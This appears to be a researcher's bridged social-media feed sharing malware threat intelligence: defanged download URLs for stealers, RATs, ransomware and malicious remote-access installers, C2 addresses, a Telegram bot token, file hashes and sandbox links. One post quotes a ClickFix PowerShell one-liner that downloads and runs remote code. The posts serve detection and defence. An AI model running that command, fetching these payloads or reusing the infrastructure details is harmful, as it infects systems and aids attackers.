James_inthe_box
james-inthe-box.infosec.exchange.ap.brid.gy
James_inthe_box
@james-inthe-box.infosec.exchange.ap.brid.gy
#malware

[bridged from https://infosec.exchange/@james_inthe_box on the fediverse by https://fed.brid.gy/ ]
#malware not detonating and crashing out? Try my patented "shotgun" method and run like 15 copies at once! Spoiler, it actually does work in many cases ;)
https://app.any.run/tasks/98ee9a03-06d0-4c94-af52-53a84d3a3132
January 26, 2026 at 2:56 PM
When you distribute your malicious #screenconnect on your c2 🙃

https://app.any.run/tasks/5e815a05-a047-4010-aefc-9d6f95c1127b
January 21, 2026 at 10:32 PM
Finally saw something when installing those malicious #rmm #screenconnect (at https://mkaos.alwaysdata\\.net/eStatementSsaGov.msi)

https://app.any.run/tasks/399383f4-5ab6-4f53-ab93-09d36c891041
January 20, 2026 at 2:50 PM
If you've been experiencing these new #malspam with @Action1corp #action1 RMM, there's a tasty lil file called C:\Windows\Action1\what_is_this.txt that's everything you need to know:
https://app.any.run/tasks/a38ca435-f03f-4e77-aac0-f7446b6fe4df
January 16, 2026 at 3:07 PM
#destiny #stealer at:

http://wittenhorst\\.eu/tmp/imgs.exe

c2: 86.54.42.197
January 14, 2026 at 2:19 PM
New twist on #clickfix ; valid-ish looking command, but really:
powershell -wi mi -EP B -c iex(irm 87.121.82\\.41/w.GRE)
January 9, 2026 at 2:31 PM
A short (and late due to vacation) csv formatted list of #malspam campaigns that crossed my path in December to include #malware type, subject, hash, c2, and email exfil addresses:

https://gist.github.com/silence-is-best/720a513ff366780662870bc0dd080ce3

#retrohunt
January 5, 2026 at 3:52 PM
Still active #mamona #ransomware at (pardon the language):

http://178.16.54\\.109/lfucky.exe
January 5, 2026 at 2:01 PM
December 18, 2025 at 5:52 PM
December 18, 2025 at 2:57 PM
Heads up on modified #clickfix ; doesn't fire until you click the Verify block:
December 16, 2025 at 6:27 PM
#xworm #AsyncRAT #purehvnc at:

https:// locale-respondent-realtor-excellent.trycloudflare\\.com
December 15, 2025 at 6:55 PM
#lokibot (believe it or not) at:
https://ballotlinllc\\.top/kellymnb/ENCRYPTED.ps1

c2: http://91.92.243.\254/kelly/five/fre.php

65312b1b16f7928cbd0fa79bc12fe75dac2f610d13a54848a8b6f52d035f870d on the ps1
December 12, 2025 at 3:18 PM
A csv formatted list of #malspam campaigns that crossed my path in November to include #malware type, c2, hash, subject, and some email exfil addresses:

https://gist.github.com/silence-is-best/b0eed8c8a6d6f6381a30d17047603726

#retrohunt
December 1, 2025 at 6:18 PM
An unusually large, moments ago #botnet scan all from source port 19000 (not the "usual" Amazon sourced scans that I see every morning like clockwork at 06:45). Raw logs and source IP's:

https://gist.github.com/silence-is-best/65c9fe419f8b0551b5f1ce9356e9d13f
November 28, 2025 at 2:02 PM
Maybe I'm crazy, but I always thought explorer.exe ran at boot regardless?
November 26, 2025 at 7:57 PM
#snakekeylogger at:

https://intesmak\\.com/obitwo

c2: https://api.telegram\\.org/bot8099843793:AAGeYKMLti1IpyT9o6bz7OtgdXF9md25uXA
November 24, 2025 at 2:10 PM
November 21, 2025 at 9:37 PM
Evil #logmeinrescue at:

https:// connectme-1ke.pages. dev/LogMeInResolve_Unattended.msi

e56e5f1f37b6c2ae9f4f1b2e7ab2f7aee9ca91c4c84334dd5bb49675de619736

Company ID: 8400521075231559185
November 21, 2025 at 7:54 PM
#stealerium hosted at:
http://31.57.147.77:6464/gethta
http://31.57.147.77:6464/getdll

hash 88feadbb2f9548d3c0cb9c6519bcea476acf9ac2a3eeccde5655457cbba29db4 on the dll
November 20, 2025 at 6:44 PM
#evil #logmeinrescue at:

https://www.filemail\\.com/d/hxuvtnorqdzqppi

Company ID: 172104807361994773
November 17, 2025 at 5:22 PM
#malware #opendir #XLoader (small one works, big one not so much) at:

https://royfils\\.com/encrypt/

2cd9b8fb88e7cbbc5c049441fb61e0aea7be23dc7aa2c109c13abefe7a2ac943

4733feaca04e871d4e0bb052f2437a2f46f10852602ea4f8b2f0170f4838dd87
November 5, 2025 at 5:39 PM